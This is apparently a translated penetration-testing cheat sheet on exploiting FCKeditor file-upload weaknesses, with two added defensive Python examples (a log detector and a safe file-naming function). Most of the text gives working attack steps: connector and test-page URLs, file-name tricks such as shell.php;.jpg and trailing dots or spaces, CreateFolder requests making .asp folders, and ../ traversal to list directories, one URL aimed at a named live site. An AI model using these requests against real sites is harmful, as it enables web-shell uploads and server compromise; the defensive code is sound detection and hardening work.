1. View Editor version

FCKeditor/_whatsnew.html
——————————–
2. Version 2.2 release
Apache + Linux environment: a . appended after the uploaded file name bypasses the check. Tested.
3. Version <= 2.4.2, PHP
When handling the Media type, the PHP upload code applies no control over the uploaded file type, so users can upload any file.
Save the following as an HTML file and change the action address:
action="http://www.wfda.net/admin/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">

4. Bypassing FCKeditor's conversion of "." to "_" (underscore) in uploaded file names
Very often an uploaded file such as shell.php.rar or shell.php;.jpg is renamed to shell_php;.jpg. This is a change made in newer FCK versions.
4.1: Submit shell.php followed by a space to get around it.
The trailing space only works on Windows systems; *nix does not support it [there, shell.php and "shell.php " are two different files; not tested].
4.2: Uploading a file with the same name again changes the name to shell.php;(1).jpg. A new folder can also be created: only the first-level directory is checked, and moving into a second-level directory is not restricted.
5. Bypass by creating a folder
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=Z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=aa.asp

http://www.wfda.net/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

6. FCKeditor file upload test pages
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html

————————————————– ————————————————-
7. Common upload addresses
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php (tested on ver. 2.6.3)
JSP version:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

Note: change the red part to the scripting language FCKeditor actually uses. The blue part is a folder name you can customize, and it can also use ../.. for directory traversal. The purple part is the actual website address.
————————————————– ————————————————
8. Other addresses
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
Many sites have generally deleted the _samples directory, but it can be tried.
FCKeditor/editor/fckeditor.html cannot upload a file directly. Click the upload picture button and then choose to browse the server, and files can be uploaded. The page it jumps to is in fact one of the addresses in 7. Common upload addresses.
————————————————– ————————————————
9. Directory listing can also help to find the upload address
Tested on version 2.4.1.
Modify the CurrentFolder parameter with ../../ to enter different directories:
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=aspx.asp
From the returned XML information, all directories of the site can be viewed.
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
Drive letters can also be browsed.
JSP version:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/
10. Path disclosure vulnerability
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/1.asp

/browser/default/connectors/php/connector.php?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=test.asp
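
The connector requests in items 5 to 10 leave recognisable traces in a web server's access log. The following detection sketch is an added example, not part of the original page: it assumes a combined-format access log, the log lines are constructed, and the finding names are hypothetical labels.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
CONNECTOR = re.compile(r"/filemanager/.*/(connector(\.\w+)?|upload\.\w+)$")
TEST_PAGE = re.compile(r"/filemanager/.*test\.html$")
# Script suffixes as they appear in the folder names on this page.
SCRIPT_EXT = re.compile(r"\.(asp|aspx|asa|cer|php\d?|jsp)\b", re.I)

def classify(log_line):
    """Return the findings for one access-log line (empty list if none)."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    path = url.path.lower()
    if TEST_PAGE.search(path):
        return ["test-page-request"]
    if not CONNECTOR.search(path):
        return []
    # parse_qs percent-decodes values, so %2e%2e/ is seen as ../
    q = {k.lower(): v[0] for k, v in
         parse_qs(url.query, keep_blank_values=True).items()}
    folder, new_name = q.get("currentfolder", ""), q.get("newfoldername", "")
    findings = []
    if ".." in folder:
        findings.append("currentfolder-traversal")
    if SCRIPT_EXT.search(folder):
        findings.append("script-suffix-in-currentfolder")
    if q.get("command", "").lower() == "createfolder" and SCRIPT_EXT.search(new_name):
        findings.append("script-suffix-in-new-folder")
    return findings

# Constructed sample log lines (client addresses from a documentation range).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /FCKeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 900',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ HTTP/1.1" 200 412',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2e%2e/%2e%2e/&NewFolderName=aspx.asp HTTP/1.1" 200 300',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=Z HTTP/1.1" 200 300',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 5120',
]

def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    return [(i, f) for i, line in enumerate(lines, 1) if (f := classify(line))]

print(scan(SAMPLE_LOG))
```
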

11. Lax filtering caused by FCKeditor's passive restriction policy
Affected versions: FCKeditor x.x <= FCKeditor v2.4.3
Vulnerability description:
In FCKeditor v2.4.3 the File type denies these upload types by default:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
FCKeditor 2.0 <= 2.2 allows uploading files with the asa, cer, php2, php4, inc, pwml and pht suffixes.
When the uploaded file is saved, the code directly uses $sFilePath = $sServerDir . $sFileName and does not use the $sExtension suffix.
As a direct result, on Windows a . appended after the uploaded file name bypasses the check [not tested].
Under Apache, the "Apache file name parsing flaw vulnerability" can also be used. It is also recommended, for other upload vulnerabilities where the Type variable is defined, to use the File type when uploading files; according to the FCKeditor code, its limitations are the most restrictive.
If script files can be uploaded directly, very good, but some versions may not allow it. In that case follow the file name with a . or a space to get around the check. The 2003 parsing vulnerability can also be used by creating an xxx.asp folder or uploading xx.asp;.jpg.
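
The file-name tricks in items 4 and 11 all depend on the stored path being built from the client-supplied name and checked against a deny list. The following is an added example of the opposite approach, not FCKeditor code: the function names, the allowlist and the folder-name pattern are assumptions chosen for illustration.

```python
import re
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}       # assumed allowlist for an Image type
FOLDER_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")  # no dots, so no "xxx.asp" folders

def stored_name(client_name):
    """Return a server-generated file name for an upload, or None to reject it.

    The client's name is only used to read the final extension; the name
    written to disk never contains client-controlled text."""
    # Windows drops trailing dots and spaces, so "shell.php." is stored as
    # "shell.php"; leading dots would create hidden or config-style files.
    if client_name != client_name.strip(" ."):
        return None
    # ';' is what makes "xx.asp;.jpg" dangerous; also refuse path separators,
    # ':' and control characters.
    if re.search(r'[;:/\\\x00-\x1f]', client_name):
        return None
    stem, dot, ext = client_name.rpartition(".")
    if not dot or not stem or ext.lower() not in ALLOWED_EXT:
        return None
    return f"{secrets.token_hex(16)}.{ext.lower()}"

def valid_folder(current_folder, new_folder_name):
    """True only if every segment of the path and the new name is a plain name."""
    segments = [s for s in current_folder.split("/") if s]
    return all(FOLDER_NAME.fullmatch(s) for s in segments + [new_folder_name])

if __name__ == "__main__":
    # Names taken from the items above, plus one ordinary upload.
    for name in ["shell.php.rar", "shell.php;.jpg", "shell.php ", "shell.php.", "photo.JPG"]:
        print(repr(name), "->", stored_name(name))
    print(valid_folder("/", "aa.asp"), valid_folder("../../../", "test.asp"))
```
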
These methods were collected from the Internet and from lessons learned in everyday penetration testing. There may be some omissions, to be added when remembered; there are also things I have not found myself, which rely on all of you to discover and share.